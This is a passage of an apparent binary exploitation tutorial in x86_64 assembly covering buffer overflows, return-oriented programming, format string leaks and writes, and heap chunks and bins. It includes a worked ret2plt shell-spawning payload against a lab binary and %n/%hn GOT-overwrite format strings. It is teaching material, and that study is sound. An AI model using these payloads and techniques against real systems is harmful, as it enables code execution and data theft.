Some instructions act differently depending on whether the number is signed or not. The x86_64 architecture has unsigned and signed versions of multiplication, division, and bit shifts. Bit shifting is when you move all the bits of a value to the left or the right a certain number of times. Each shift left (shl/sal) multiplies the number by 2 for every bit you shift. Each shift right (shr/sar) divides the number by 2 for every bit you shift. For example a shift left by 1 multiplies the number by 2, a shift left by 2 multiplies the number by 4, a shift right by 1 divides the number by 2, a shift right by 2 divided the number by 4. The sal and shl instructions do the same thing, however, shr and sar are not the same. shr simply shifts to the right while sar is the same but it copies the sign bit. When bit shifting some bits will get removed out of the value, for example in a right shift by 1 the right most bit will be removed from val and the other bits will be pushed to the right and the left most bit would become 0 if shr were used, but if sar were used the left most bit would copy the sign bit. The same concept applies with shl/sal but in reverse. to make the bits wrap around to the other end of the value we can use the ror/rol instructions which makes sure there is no bit loss. Note that the second argument of any bit shift operation must be an actual number or the cl register while the first argument must be a register or pointer the usage of the bit shifting instructions is like this: ``shr rax, 7``.
The mul instruction performs an unsigned multiplication by whatever is in rax, eax, ax, al by a register or a pointer. If the register or pointer is a byte in size, al is multiplied and the result is stored in ax, if mul is used with a 2 byte pointer or register, ax will be multiplied and the upper half of the result will be stored in dx while the lower part is stored in ax, if the result wasn't big enough for a split dx will be set to 0, the same concept applies for eax and edx, rax and rdx. If the upper half of the result isn't 0 the CF (carry) flag and the OF (overflow) flag will both be set, otherwise they will be cleared. The usage of mul is like this: ``mul rbx``. The imul instruction has three forms, the first form being just like mul, but it treats the argument as a signed number, it can be used like ``imul rbx``. The second form of imul has the first argument as a register and the next argument being a pointer or a register, it can be used like ``imul ebx, ecx``. The third form of imul is like the second form but has one more argument that must be an actual number, this form of imul multiplies the second and third argument and stores the result in the first argument which must be a register.
The div instruction performs unsigned division. It takes a number made up of two connected registers being the high and low half, and divided it by either a register or a pointer. The result is split into the quotient and the remainder, the quotient goes into the lower register, while the remainder goes into the higher register. For a byte argument, the lower register will be al and the higher register will be ah, for a 2 byte argument the lower register will be ax and the higher register will be dx, and so on. The cqo instruction sign extends rax into rdx, while cdq is the same but for eax and edx.
The difference between the jg(e)/jl(e) and ja(e)/jb(e) is that the first set is for signed numbers and the next set is for unsigned numbers. Mixing the different types of jumps may not seem bad but in reality it is. For example say we want to jump somewhere if our number is less than 0:
```
cmp qword [rel USER_NUMBER], 0
jb location
```
The code would NEVER jump to location because this is an unsigned check and nothing is below 0.
Say we have:
```
cmp qword [rel USER_NUMBER], 73
jl location
```
This code will work if USER_NUMBER is 72 or below as a signed number, the reason that is so bad is because if there is a signed check like in the above example and USER_NUMBER is negative and we may use USER_NUMBER for something such as the size of a buffer which brings us into the next chapter.
## [[#chapter three - Out of Bounds Reads and Writes]]
A buffer is a contiguous block of memory that is used to store data. Think of a buffer like a group of identical boxes in a line one after the one with no space in between them. A buffer has a start (where in RAM does it begin) and a length (how many bytes are reserved for the buffer). Since a buffer is in memory, it could be at multiple different sections of the process such as the stack, .data, .bss, the heap, etc. A 4 byte buffer could have the contents: 0x7, 0x0, 0x0, 0x0, and could be interpreted at a 4 byte number. It is up to the process on how to treat and interpret the buffer.
Say we have a video game where we have a function that write the names of the top X players in the leader board to a file. After the leader board in memory, say we have the passwords of all of those users in the video game. If X was bigger than the number of players, the passwords of those players would be written to the files along with their usernames which would be bad. Say we have the following code:
```
read_top_X_players_from_leaderboard:
lea rsi, [rel leaderboard_user01_username]
[WRITES DATA TO FILE STARTING AT THE ADDRESS THAT RSI CONTAINS STOPPING WHEN RDI MATCHES THE NUMBER OF 0s]
ret
some_random_function:
...
mov rdi, [rel USER_CONTROLLED_NUMBER]
call read_top_X_players_from_leaderboard
...
section .data
leaderboard_user01_username "user", 0
leaderboard_user02_username "User", 0
leaderboard_user03_username "uSer", 0
leaderboard_user04_username "usEr", 0
leaderboard_user05_username "useR", 0
leaderboard_user01_password "password", 0
leaderboard_user02_password "Password", 0
leaderboard_user03_password "pAssword", 0
leaderboard_user04_password "paSsword", 0
leaderboard_user05_password "pasSword", 0
```
Since rdi is user controlled, we simply set our user_controlled_number to 10 and we have the usernames and passwords of every user on the leader board. The above concept is called an out of bound read. An out of bound read occurs when we can view more data than the original process intended because of something like a bad size.
Say we have a small video game where the user's name is stored in a buffer of 10 bytes, and right after the buffer is the user's health as a 4 byte number. Say the code is the following:
```
; Say user_name is 10 bytes long and user_health is stored right after user_name
create_user:
mov byte [rel user_health], 100
xor eax, eax
xor edi, edi
lea rsi, [rel user_name]
mov edx, 20
syscall ; read syscall
ret
```
The above code is poorly designed because user_name is 10 bytes long but we are reading 20 bytes, the user's health could be corrupted if more than 10 bytes are entered. The term to describe when a buffer's contents go beyond the length of the buffer and may corrupt other data is called a buffer overflow or an out of bound write.
If we had a buffer overflow on the stack instead of overwriting data in front of the buffer, data before the buffer would be corrupted because the stack grows downwards (remember?). Assuming there is no stack canary in this example, if we had a buffer overflow on the stack and if this buffer overflow, overflowed the return address we could return anywhere in a section that is executable, such as the PLT and .text. If the stack was executable in this example, we could even return to a buffer on the stack and stack running that buffer like code assuming we knew the address of the buffer. The idea of running code on the stack is called shellcode. In most modern programs, the stack is NX, so it cannot be executed however we can still return anywhere we want inside an executable section assuming there is no stack canary and no shadow stack. The following code is an example of controlling where we return to after overwriting the return address.
```
global main
extern system
section .text
helpful_gadgets:
pop rdi
ret
func:
sub rsp, 16
mov edx, 1000
mov rsi, rsp
xor edi, edi
xor eax, eax
syscall ; read
mov byte [rsi + rax - 1], 0
xor edx, edx
dec edx
loop:
inc edx
mov bl, byte [rsi + rdx]
mov byte [string + rdx], bl
cmp dl, 15
jl loop
lea rdi, [rel echo]
call system
add rsp, 16
ret
main:
call func
mov edi, 7
mov eax, 60
syscall ; exit
section .data
bin_sh db "/bin/sh", 0
echo db "echo buffer: "
string times 10 db 0
```
We can overwrite the return address so instead of returning to the intended spot, the process could return anywhere we want inside an executable section. We could make this process even spawn a shell with the correct input. By first writing enough bytes to reach the return address, then we would overwrite the return address with the address of ``helpful_gadgets``. The next 8 bytes of the input would be equal to the address of bin_sh so it gets popped into rdi and returns to the next element on the stack. After that, the next 8 bytes of the input would be equal to the ``ret`` instruction after the ``pop rdi`` inside of ``helpful_gadgets`` so the stack is aligned by 16 bytes for the call to system. The next 8 bytes would be the address of the call to system inside of ``func``. The next 16 bytes would be anything because after the call to system inside ``func``, the stack is added by 16 bytes and returns to the next element on the stack which we could make anything such as the ``mov edi, 7`` inside of ``main``, after edi is made equal to 7, since there is an exit syscall right after, the process would exit.
I want to drive home the point that if we have control over the return address and bytes after, we basically have full control over the process (assuming there is no shadow stack). For example say we have the following code:
```
add_7:
add eax, 7
ret
add_14:
add eax, 14
ret
add_21:
add eax, 21
ret
```
If we have control over the return address and the bytes after we can return anywhere inside an executable section, like we can return to add_14, add_7, then add_21, or add_7, add_21, then add_14. A pretty cool thing to note is that since above a lot of ret instructions are a lot of pops so say we know there is a call to some function that takes 3 arguments (rdi, rsi, rdx), we can find code that pops data into these registers ending in a ret. These little snippets of code that end in ret that do stuff like pop data into registers, set registers to a certain value, add 2 registers together, etc are called gadgets. Gadgets dont actually have to end in a ret, they can end in a call or a jump aswell. The idea of stringing together gadgets that end in ret to make the process do a certain thing is called return orientated programming (ROP) if the gadgets end in a jump it would be called jump orientated programming (JOP), and if those gadgets ended with a call it would be called call orientated programming (COP).
Say we have the following code for a video game:
```
inc_gold:
lea rdi, [rel OUR_PLAYER_ADDRESS]
cmp IS_ADMIN, qword [rdi + IS_ADMIN_OFFSET]
jne return
inc byte [rdi + GOLD_OFFSET]
return:
ret
```
Say earlier in the process we got control over the return address and bytes after, assuming the player address isn't in rdi, first we would first return to ``lea rdi, [rel OUR_PLAYER_ADDRESS]``, the code would check if we are an admin or not (in this case we arent) and the process would return to wherever but since we have control over the return address and the bytes after, we can make the process return to ``inc byte [rdi + GOLD_OFFSET]`` over and over again until we are satisfied with our amount of gold. The purpose of this game example is to show you that we can truly return anywhere inside any executable section we want. In a binary linked against libc, there are a lot of places to return to assuming once again that we have control over the return address, the bytes after, and that there is no shadow stack. From this old example we could get a shell a different way:
```
global main
extern system
section .text
helpful_gadgets:
pop rdi
ret
func:
sub rsp, 16
mov edx, 1000
mov rsi, rsp
xor edi, edi
xor eax, eax
syscall ; read
mov byte [rsi + rax - 1], 0
xor edx, edx
dec edx
loop:
inc edx
mov bl, byte [rsi + rdx]
mov byte [string + rdx], bl
cmp dl, 15
jl loop
lea rdi, [rel echo]
call system
add rsp, 16
ret
main:
call func
mov edi, 7
mov eax, 60
syscall ; exit
section .data
bin_sh db "/bin/sh", 0
echo db "echo buffer: "
string times 10 db 0
```
So we would overwrite the return address with ``helpful_gadgets``, the next 8 bytes of the input would be bin_sh, after that the next 8 bytes would be system's PLT entry. The final 8 bytes of the input would be the address of ``mov edi, 7`` inside ``main``. Returning to a libc function's plt is a much better way of calling a libc function usually because if the process returns to the libc function's plt, after the libc function is finished executing it will return unlike an actual call to the function which is probably going to be in the middle of a bunch of code.
You may be asking "how do I actually find the address of a function or gadget?" Well for the above examples we were going with the assumption that PIE was disabled. In the real world, PIE will be enabled for most binaries. To find the address of a function or gadget with PIE disabled we will go to the ~/labs directory and open the 01_ret2plt_buffer_overflow in gdb. First we will look at the ``func`` function via the ``disass func`` command which will show us this:
```
Dump of assembler code for function func:
0x0000000000401132 <+0>: sub rsp,0x10
0x0000000000401136 <+4>: mov edx,0x3e8
0x000000000040113b <+9>: mov rsi,rsp
0x000000000040113e <+12>: xor edi,edi
0x0000000000401140 <+14>: xor eax,eax
0x0000000000401142 <+16>: syscall
0x0000000000401144 <+18>: mov BYTE PTR [rsi+rax*1-0x1],0x0
0x0000000000401149 <+23>: xor edx,edx
0x000000000040114b <+25>: dec edx
End of assembler dump.
```
We can see that we are calling the read syscall with a size of 1000, however there is only 10 bytes on the stack we can use before the return address gets overwritten. So now lets look at the loop part of ``func`` to see if anything crazy is happening. We will type ``disass loop`` and we will see this:
```
Dump of assembler code for function loop:
0x000000000040114d <+0>: inc edx
0x000000000040114f <+2>: mov bl,BYTE PTR [rsi+rdx*1]
0x0000000000401152 <+5>: mov BYTE PTR [rdx+0x40402d],bl
0x0000000000401158 <+11>: cmp dl,0xf
0x000000000040115b <+14>: jl 0x40114d <loop>
0x000000000040115d <+16>: lea rdi,[rip+0x2ebc] # 0x404020
0x0000000000401164 <+23>: call 0x401030 <system@plt>
0x0000000000401169 <+28>: add rsp,0x10
0x000000000040116d <+32>: ret
End of assembler dump.
```
We see that we copy 15 bytes over from rsi + rdx to 0x40402d + rdx. We also see that system@plt is located at 0x401030 which will be important for our input. We can type ``x &bin_sh`` to get the address of ``bin_sh: 0x404018: "/bin/sh"``, we see that the string "/bin/sh" is stored at that address. Now finally we can enter ``disass helpful_gadgets`` to get the address of helpful_gadgets and look at it's code, we see that pops the top element off the stack and into rdi and then returns:
```
Dump of assembler code for function helpful_gadgets:
0x0000000000401130 <+0>: pop rdi
0x0000000000401131 <+1>: ret
End of assembler dump.
```
We can reason about how to craft our input, we know that we need 16 bytes to reach the return address, we want to pop bin_sh into rdi and call system. We can now craft our input: ``MMMMMMMMMMMMMMMM\x30\x11\x40\x00\x00\x00\x00\x00\x18\x40\x40\x00\x00\x00\x00\x00\x30\x10\x40\x00\x00\x00\x00\x00\x73\x11\x40\x00\x00\x00\x00\x00``
The \x before the number means we want the next two characters be treated at a whole hex number, the reason there are 0s after the addresses in little endian is so we can make sure that there is enough spacing between elements, we want each address to be 8 bytes long so we need those padding 0s. For the stack popping. Say we want to run the input against the program, we would first write our input to a file like this: ``printf 'MMMMMMMMMMMMMMMM\x30\x11\x40\x00\x00\x00\x00\x00\x18\x40\x40\x00\x00\x00\x00\x00\x30\x10\x40\x00\x00\x00\x00\x00\x73\x11\x40\x00\x00\x00\x00\x00' > example.bin``. We would than test the input against the program with the sender program like this: ``sender 01_ret2plt_buffer_overflow example.bin``. We would then get a shell.
When looking at a function it is important to keep track of the space from the buffer to the return address so we know how many bytes to input to reach the return address.
If PIE is enabled, things get more complicated, we would know the offsets (which are how far things are from the start of the program) of the functions, gadgets, strings, etc however we would not know the base so we would need to find it. We can get the offsets by doing what we did before in GDB, instead of getting the full addresses this time, we would see the offsets in GDB because PIE is enabled. There are many ways to get the base such as: using the cat program like this: ``cat /proc/PID/maps``, the first address on the first line would be the base of the process. We would add the base to the offsets to get the addresses of the data. Another way to get the base of the process is to get a known offset in the process and subtract the offset when the program is running (a process!) to when the program is not running.
Every program that uses glibc functions has a function called ``__libc_csu_init``, and in that function are a bunch of gadgets that pop data from the stack into registers. For example a small part of ``__libc_csu_init`` could look like this:
```
pop r9
pop r8
pop r10
pop rdx
pop rsi
pop rdi
ret
```
Which would be very useful to use because we have a bunch of instructions that make certain registers hold any value we want and then return where we want, assuming we return to an executable section.
Stack pivoting is where we change the stack pointer so it holds the address of a memory section we control. When the stack pointer is changed to hold the address of something in a memory region we control, that memory region will be treated like the new stack. For example say you know an address of a section that is writable and executable (WHICH IS EXTREMELY RARE), say you write some shell code in that section, and you make the stack pointer equal to the first address in that section, also say that you make the instruction pointer equal to the stack pointer, you would have full control over that process because you can run anything you desire. Another example of stack pivoting is say the stack size is too small and you cant push more than 2 elements on the stack, you would change the stack pointer to point to somewhere else that must at least be writable so you can push/pop data to that new stack.
## [[#chapter four - Format String Fun]]
The printf function is a glibc function that can be used in a variety of ways, for example say we want to print a 4 byte number, we would do this:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 123456789
call printf
add rsp, 8
ret
section .data
fmt db "%d", 10, 0
```
Note that the 10 is there to print a newline, which is just a way to say "anything after this character gets printed below what was already printed." The 0 is there to end the string.
As you know, glibc functions read arguments as follows: rdi, rsi, rdx, rcx, r8, r9, on the stack also note that the stack pointer has been aligned to 16 bytes because printf requires it. When the main function executes its code the stack pointer will not be aligned by 16, so we must subtract the stack pointer by 8. The arguments of that call to printf would be: the address of fmt (based off of the instruction pointer) and the number 123456789 in the above example. The glibc function printf takes more arguments than you say, in fact, printf can take as any arguments as the format string specifies. For example:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 123456789
call printf
add rsp, 8
ret
section .data
fmt db "first num: %d, second num: %d, third num: %d, fourth num: %d", 10, 0
```
In the above code, printf can be thought of as walking through the string that rdi holds the address of, and goes through it one byte at a time, printing each byte, when it encounters the % character it knows that part of the string is a format specifier, which simply are the things that start with %. Format specifiers can have certain characters after the % such as d, p, x, s, n, etc (you will see more later!). When printf sees a format specifier, it replaces said specifier with the next argument, so the first format specifier would be replaced with the contents of rsi, the next with the contents of rdx, the next with rcx, and so on. Note how we did not set rdx and rcx, printf would just print whatever is currently there. If there are more arguments than registers, printf will start grabbing data from the stack, starting at the stack pointer plus 8 bytes, and would go 8 bytes at a time. Before I go deeper, I want to tell you about the %s format specifier, it treats the data it has as an address and prints data starting at that address byte by byte until it reaches a byte equal to 0 (otherwise called a null byte). Say we wanted to print 10 arguments as 4 byte hex numbers with printf, we could do that like this:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
call printf
add rsp, 8
ret
section .data
fmt db "%x, %x, %x, %x, %x, %x, %x, %x, %x, %x", 10, 0
```
Truthfully, it would not matter what the arguments are, printf will simply give back as many arguments as there are format specifiers. One another thing I want to note before I go deeper is that there is actually some format specifier tricks such like: "print at least this many characters", "print this argument instead of that one", "print this many zeros before the corresponding argument", "add a 0x before the corresponding argument", etc. To print a minimum of 16 characters, we could do the following:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 7
call printf
add rsp, 8
ret
section .data
fmt db "%16x", 10, 0
```
The above code would print 15 bytes of the space character, followed by 7. To replace the space character by zero, we would put a 0 before the 16, like this: %016x. Say printf was called with 2 arguments excluding rdi of course, and say we wanted for some reason to print the same argument, we could do the following:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 123456789
mov edx, 1738
call printf
add rsp, 8
ret
section .data
fmt db "%d and %1$d", 10, 0
```
The above code would print the contents of esi twice because we specified that in the second format specifier that we want it to select the first argument instead of the second which it would have selected by default.
We can print a certain number of characters from an argument in printf using the \* character, for example %\*c, takes the current argument as how many times it should print the padding bytes, followed by the next argument:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 7
mov edx, 'm'
call printf
add rsp, 8
ret
section .data
fmt db "%*c", 10, 0
```
The above code will print 7 characters in total, 6 padding characters and then m
A leak is when we access bytes the process never intended to give us. You saw leaks above but this time I am going to explain them. An example of a leak could be getting the value of the stack canary. The glibc function printf can leak data, as you say above indirectly. Say we wanted to leak the 4 bytes of the first 4 arguments, we simply can do this:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
call printf
add rsp, 8
ret
section .data
fmt db "%x, %x, %x, %x", 10, 0
```
The above code would give us the 4 lower bytes of rsi, rdx, rcx, and r8. If we wanted the full address we would replace x with p. Like you say above briefly, we dont even need to enter 10 printf arguments to leak the 10th argument, we simply make rdi a pointer to the string "%10$p". I also showed above that %s treats the current argument like an address and prints the data there until it reaches 0. Say we have a secret string at the 12th argument, if we could make rdi hold the address of a string like "%12\$s" right before printf is called, the secret string would be printed. Some times you may not know which argument holds the data you care about or if any argument even holds it. The only way to find them is to scan for them, scanning is basically just testing a variation of strings that rdi will hold when printf is called. An example of some strings could look like this: %7\$p, %20\$s, %12\$x, etc.
Remember PIE randomizes where the program gets mapped in virtual memory but doesn't modify the distances between the sections. Those distances stay the same, so if an address came from a program section, you would subtract the section's offset in the program from the leaked address to get the base of the process. Say you leak an address that is in the .text section you can actually bypass PIE. Say the 7th argument holds this address: 0x555555554777, and say that address belongs to .text, bypassing pie would be as easy as pie! You would look in gdb at the program and see something like this:
```
0x0000000000000777 <+0>: [SOME ASSEMBLY INSTRUCTION]
```
From that leak you would subtract 0x555555554777 by 0x777 and would know where the process is in virtual memory. You may be thinking "wait do I know if that address is from that offset?" The answer is, as you may recall ASLR randomizes all the bits of the section start besides the lower 12, So all you would need to do is to check if the lower 12 bits from the leak match the offset inside the program. You may be asking "Why does knowing the base address of the process matter?" The reason why knowing the base address matters is because we can simply take any program and look at in gdb to see the offsets of everything, for example, we would know .text is here, this random string is here, etc. With the base of the process leaked we know where that stuff is when the process is running. If we can read/write/execute anything we want in the process, we would know where everything is. Say we have a buffer overflow on the stack and we overwrite the return address, we now know where to return to exactly.
With printf, not only can we leak data, we can also WRITE to addresses. The %n specifier writes the amount of bytes printed so far, as a 4 byte number into whatever the argument's data is, treated like an address. For example if we wanted to write 7, treated as 4 bytes into address 0x1337, we could do this:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 0x1337
call printf
add rsp, 8
ret
section .data
fmt db "AAAABBB%n", 10, 0
```
If we are assuming 0x1337 is a valid virtual address, 4 bytes (3 bytes are 0, the other byte is just 7), would be written there If we wanted to write 7 as an 8 byte number, we would use this format specifier: %ln, if we wanted to write 2 bytes we would do %hn, finally, if we wanted to write a single byte we would do this: %hhn. Say we wanted to write the previous amount of bytes printed to the 20th argument's data as an address, we could simply do this: %20$n. It's important to note that printf counts the actual bytes printed not that bytes in the string, for example say we have the following string: "mmmmmmmmm%7c%n", 16 bytes would be printed before we write to the address that the next argument holds.
You may be asking "ok so what if we can write to anywhere in the process, can we get the process to do what we want?" The answer is yes, we can, in many different ways. For example, if we know an offset in the GOT corresponds to a certain glibc function, and if we know where the start of GOT is. If we know where the address the PLT's system function, or where the glibc function system is, we can overwrite the correct offset into GOT with system. So the next time that function is called system is called instead. In the real world, sometimes the user of a process has control over the string, assuming the code is poorly written, if a user has control over the string, they could leak data, and if the conditions are right, like rsi holding the address of an offset of a glibc function inside GOT, they could overwrite the function's offset in GOT with another function assuming they know the address, this is actually a very common scenario. If RELRO is enabled we would not be able to change anything in the GOT section, however we could still leak data. We can overwrite something inside of GOT like this say exit is in the GOT at address 0x1337, and say system is at address 0x132f inside of the GOT:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 0x1337
call printf
add rsp, 8
ret
section .data
fmt db "%4911c%1$n", 10, 0
```
We can easily write 0x132f as 4 bytes into the address 0x1337. As you seen so far, if you know the address of something, you can change it assuming you have control over the arguments printf uses including the string, however what if there is a big address you want to overwrite, you would need to print a lot of characters before %n reaches said address. Say we have the address 0x7ffff7e13370, printf cannot print anywhere close to that number of characters in a reasonable amount of time. So instead of writing said amount of characters, we break it into smaller chunks. Say we want to write 0x789f133773310000 into address 0x7ffff7e13370, the code below shows how it could be done:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov rsi, 0x7ffff7e13370
mov rdx, 0x7ffff7e13372
mov rcx, 0x7ffff7e13374
mov r8, 0x7ffff7e13376
call printf
add rsp, 8
ret
section .data
fmt db "%1$hn%29489c%2$hn%40966c%3$hn%25960c%4$hn", 10, 0
```
Before I tell you what the above code does, it is important to know when printf encounters %n it takes the amount of bytes printed and only uses the lower 4 bytes, if printf encountered %hn it would be the same idea just with 2 bytes instead of 4 bytes. First of all, the %1$hn part of the string writes 0 as 2 bytes to 0x7ffff7e13370, then we have %29489c which prints 29489 more bytes, which makes the amount of bytes printed equal to 0x7331, the amount of characters printed are written to 0x7ffff7e13372 as 2 bytes via %2\$hn. We have %40966c which prints 40966 more characters which results in 0x11337 bytes being printed, %3\$hn writes lower 2 bytes of the amount of characters to 0x7ffff7e13374 which is 0x1337. We print 25960 more bytes, the result of bytes printed is 0x1789f. Finally, we write the lower 2 bytes of the amount of characters which is equal to 0x789f to 0x7ffff7e13376 via %4\$hn.
## [[#chapter five - Dangling Pointers]]
As you may recall a pointer is a register or a memory address that holds an address. Pointers can be used for a variety of reasons, for example, say we have a register that holds the address of a string, and we want to capitalize all the lowercase characters, we could do this:
```
global _start
section .text
_start:
sub rsp, 15
mov byte [rsp], 'h'
mov byte [rsp + 1], 'e'
mov byte [rsp + 2], 'l'
mov byte [rsp + 3], 'l'
mov byte [rsp + 4], 'o'
mov byte [rsp + 5], ' '
mov byte [rsp + 6], 'r'
mov byte [rsp + 7], 'e'
mov byte [rsp + 8], 'a'
mov byte [rsp + 9], 'd'
mov byte [rsp + 10], 'e'
mov byte [rsp + 11], 'r'
mov byte [rsp + 12], '!'
mov byte [rsp + 13], 10
mov byte [rsp + 14], 0
xor ecx, ecx
dec rcx
loop:
inc rcx
cmp byte [rsp + rcx], 0
je done
cmp byte [rsp + rcx], 'a'
jb loop
cmp byte [rsp + rcx], 'z'
ja loop
sub byte [rsp + rcx], 0x20
jmp loop
done:
mov edx, 14
mov rsi, rsp
mov edi, 1
mov eax, 1
syscall
add rsp, 15
mov edi, 7
mov eax, 60
syscall
```
The above code makes space on the stack for the string "hello reader!" with a newline and a 0 byte. The code sets rcx to 0 and then underflows it to it's biggest possible value, and then the loop starts. In the loop we increase rcx by 1 (rcx would now be 0 because of the integer overflow, assuming that it was at it's biggest possible value.) We check if the byte at the stack pointer plus rcx, is equal to 0, if it is we jump to done, else we continue the loop. We check if the byte at the stack pointer plus rcx is in the range of lowercase a to z, and if it is we capitalize it. We continue the loop, however if the loop is done, we print the string, restore the space on the stack, and exit with an exit code of 7.
Notice at the start of the code we subtracted the stack pointer by 15, which created 15 bytes of space for us to use. When we were done with the bytes near the end of the code we added 15 to the stack pointer. Restoring the stack pointer to it's original value which cleaned up the space we made. Once we restored the stack pointer, the space that we created was no longer ours, we simply created the space, used it, and restored it. However, if we had a pointer that pointed to the restored space, the pointer would hold an address we do not own. If that address were reused for something else, say to store a secret password, that pointer would hold the address of that password, which could be very interesting.
The above idea is called a dangling pointer, which is a pointer that points to memory that is not in use, the pointer would be the same, however the memory it points to may be reused. Say we have the following code:
```
global _start
section .text
_start:
sub rsp, 10
mov byte [rsp], 'h'
mov byte [rsp + 1], 'i'
mov byte [rsp + 2], ' '
mov byte [rsp + 3], 'r'
mov byte [rsp + 4], 'e'
mov byte [rsp + 5], 'a'
mov byte [rsp + 6], 'd'
mov byte [rsp + 7], 'e'
mov byte [rsp + 8], 'r'
mov byte [rsp + 9], 10
mov [rel dangling], rsp
mov edx, 10
mov rsi, rsp
mov edi, 1
mov eax, 1
syscall
add rsp, 10
sub rsp, 10
mov byte [rsp], 'p'
mov byte [rsp + 1], '@'
mov byte [rsp + 2], '5'
mov byte [rsp + 3], '5'
mov byte [rsp + 4], 'w'
mov byte [rsp + 5], '0'
mov byte [rsp + 6], 'r'
mov byte [rsp + 7], 'd'
mov byte [rsp + 8], '!'
mov byte [rsp + 9], 10
mov edx, 10
mov rsi, rsp
mov edi, 1
mov eax, 1
syscall
mov rax, [rel dangling]
mov byte [rax], 'x'
mov edx, 10
mov rsi, rsp
mov edi, 1
mov eax, 1
syscall
add rsp, 10
mov edi, 7
mov eax, 60
syscall
section .data
dangling dq 0
```
The above code creates space on the stack, and places the string "hi reader", 10, in that space, we save the address of the stack pointer, which points to our string into the global dangling. We setup the write syscall and write the "hi reader" string to stdout. We restore the stack pointer to it's original value. We then subtract the stack pointer by 10, reusing the space for the "p@55w0rd!" string, with the write syscall we write the "p@55w0rd!" string to stdout. We load the address that dangling holds into rax, and we write the byte 'x' to the address that rax holds. We then write "x@55w0rd!" to stdout. The reason why "x@55w0rd!" is written to the stdout is because through the global dangling we modified the string.
Truthfully dangling pointers are rarely on the stack, they are mostly found in a section called the heap.
The heap is a section of virtual memory that can grow and shrink like the stack, but only grows and shrinks when the process performs a syscall to request more or less virtual memory. However, unlike the stack the heap can be thought of as starting on the floor and growing to the ceiling, and the heap has two main parts of memory, allocated and free memory. Allocated memory is space that is currently being used for something, such as storing a buffer. Free memory is space inside the heap that is not in use at that moment. However, free memory is still a part of the heap. The heap grows when we want more allocated space but no free space is large enough for said space. For example, say we only have 4 bytes of free space, but we need 8 bytes, the heap would grow if that is the case. The heap could shrink when free bytes are at the very end of the heap and no allocated bytes are after it. Note that heap shrinking is rare.
Processes that use the heap start with one default heap section called the main arena. The main arena is used for all heap allocations assuming the process is single threaded, it is the most important heap for the process. Processes may create other heap sections, also called arenas if the process has multiple threads but only if glibc decides it needs them.
The heap has a lot of vulnerabilities tied to it historically because of one main reason, there are a lot of heap implementations, because at the end of the day the heap is just a new section that we requested to get by the kernel, and we apply certain rules. Glibc has it's own heap implementation called ptmalloc2, which has certain glibc functions we can use to manage the heap, called malloc, free, calloc, and realloc. The malloc function is used to request an allocation of a certain size in bytes, and gives back a pointer to the amount of bytes we requested. The free function simply marks a range of addresses as free, calloc is exactly the same as malloc but it sets every byte of the memory we get back to 0. Realloc is used to resize an allocation.
The heap allocates and frees with memory in the context of chunks, it is good to think of a chunk as split into two sections, the first called metadata or the header, which stores data needed to manage itself and is always 16 bytes, and the second called user data, which starts 16 bytes after the start of the chunk, and is used to store whatever we want. When we call malloc, it doesn't just allocate 16 bytes for metadata plus the size of our user data to be used, it actually takes the 16 bytes of metadata, plus the size of our user data rounded up to the next multiple of 16. If we request 7 bytes, in reality, we get a 32 byte chunk, with 16 bytes we can use, if we request 33 bytes, we get a 64 byte chunk back, with 48 bytes we can use. Note that we cannot use the metadata before our user data it is reserved for the heap.
The metadata is made up of 2 main parts, called prev_size and size, size is used to hold the size of the entire chunk for example if the amount of user data allocated was 16, size would hold 32, if the amount of user data was 32, size would be set to 48. The lower 3 bits of size, which are called P, M, A are used for certain things. P is called the PREV_INUSE flag, is the lowest bit of size, and is 1 if the chunk right before our chunk in memory, is in use, and 0 if it isn't. M is called the IS_MMAPED flag, is the second lowest bit of size, and is 1 if the chunk was allocated via mmap, which is a syscall that is used to give back new memory sections. If the chunk was allocated via mmap instead of taken from the heap, it means that chunk lives in it's own memory section separate from the heap. The bit would be set to 0 if it was not allocated via mmap. A is called the NON_MAIN_ARENA flag which is set to 1 if the chunk isn't a part of the main arena, and 0 if it is a part of the main arena.
The prev_size part of our chunk's metadata is set to the size part of the metadata for the chunk before ours in memory if the chunk before ours is free, if the previous chunk is not free, than prev_size is ignored by glibc but it is still there.
When we free a chunk via calling the glibc free function with rdi holding a pointer to our user data, glibc checks the metadata's size part of the chunk. Glibc ignores the 3 lower bits, treating them all as 0 to get the size of the whole chunk. Once glibc has the entire chunk size it looks at size's P to decide if the chunk before ours in memory is free or not, which is used for merging chunks together in some cases, which we will talk about later.
Glibc will do certain things with our chunk depending on how big it is. Glibc places chunks that were freed, based on size into these things called bins, which can be separated into different categories. The first bin is called the tcache, every thread in the process gets its own tcache. The tcache is used for chunks in the size range of 32 to 1040 bytes. Think of the tcache as 64 separate stacks, for each size with a limit of 7. For example say you have a freed chunk with a size of 48, assuming the tcache stack for said size isn't full, the chunk can be thought of as being pushed onto that stack. The reason why tcache can be thought of as a group of stacks is because when we want to reuse something from the tcache, the top element of the stack for a certain size is popped off and reused for an allocation. When a certain stack is full in the tcache the data gets added to the fastbins instead. The fastbins, which are used for chunks in the size range of 32 to 128 bytes. Think of the fastbins as 7 stacks, for each size with no limit. The reason why fastbins can be thought as a group of stacks is because when we want to reuse something from the fastbins, the top element for a specific size is popped off and used for an allocation. Smallbins are used to hold chunks with the sizes from 144 to 1008, the smallbins can be thought of as 62 buckets for each size with no limit, the reason smallbins can be thought of as buckets is because when we want to reuse data from the smallbins, we don't pop the top element off to be used as the allocated chunk like the tcache or the fastbins, instead we just grab an element from the bucket for a specific size. Largebins are used to hold chunks with sizes greater than the smallbins ranges, largebins can be thought of as having 63 buckets, with each bucket holding a range of sizes instead of a specific size. The reason why largebins can be thought of as buckets is because when we want to reuse data from the largebins, we simply grab an element from a bucket of a specific size. Unsorted bin can be thought of as a single bucket that almost every chunk that gets freed, that doesn't go into the tcache or fastbins ends up in. When something is freed that doesn't fall into the tcache or fastbins, it will end up in the unsortedbin first. 